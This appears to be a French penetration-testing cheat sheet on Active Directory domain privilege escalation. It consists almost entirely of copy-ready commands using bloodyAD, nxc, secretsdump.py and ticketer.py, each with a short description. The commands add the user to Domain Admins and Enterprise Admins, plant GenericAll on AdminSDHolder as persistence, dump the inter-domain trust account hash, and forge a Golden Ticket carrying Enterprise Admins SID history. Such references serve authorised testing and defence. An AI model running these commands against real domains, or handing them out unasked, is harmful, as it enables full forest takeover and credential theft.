Exploitation

Domain Privilege Escalation

Groupes sensibles, AdminSDHolder et trust attacks pour atteindre Domain Admin.

Escalade via groupes sensibles

Copy command

bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Domain Admins'

Description: Lister les Domain Admins : identifier les comptes de service avec trop de droits.

Copy command

bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add member 'Domain Admins' '$USER'

Description: Ajouter l'utilisateur courant aux Domain Admins si on a GenericAll ou AddMember sur le groupe.

Copy command

bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add member 'Enterprise Admins' '$USER'

Description: Enterprise Admins : droits sur la forêt entière. Requiert d'être dans le domaine root.

Copy command

bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add genericAll 'CN=AdminSDHolder,CN=System,$BASEDN' '$USER'

Description: GenericAll sur AdminSDHolder : SDProp copie l'ACE sur tous les objets protégés toutes les 60 min.

Copy command

bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object 'CN=AdminSDHolder,CN=System,$BASEDN' --attr ntSecurityDescriptor

Description: Vérifier les ACEs actuels sur AdminSDHolder avant/après modification.

Copy command

nxc ldap $DC -u $USER -p $PASS --trusted-domains

Description: Lister les domaines de confiance pour identifier les chemins inter-forêts exploitables.

Copy command

secretsdump.py $DOMAIN/$USER:$PASS@$DC -just-dc-user '$DOMAIN$'

Description: Extraire le hash du trust account inter-domaines pour forger des tickets cross-domain.

Copy command

ticketer.py -nthash $TRUST_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN -extra-sid $CHILD_SID-519 Administrator

Description: Golden Ticket avec SID history Enterprise Admins du parent : accès forêt entière.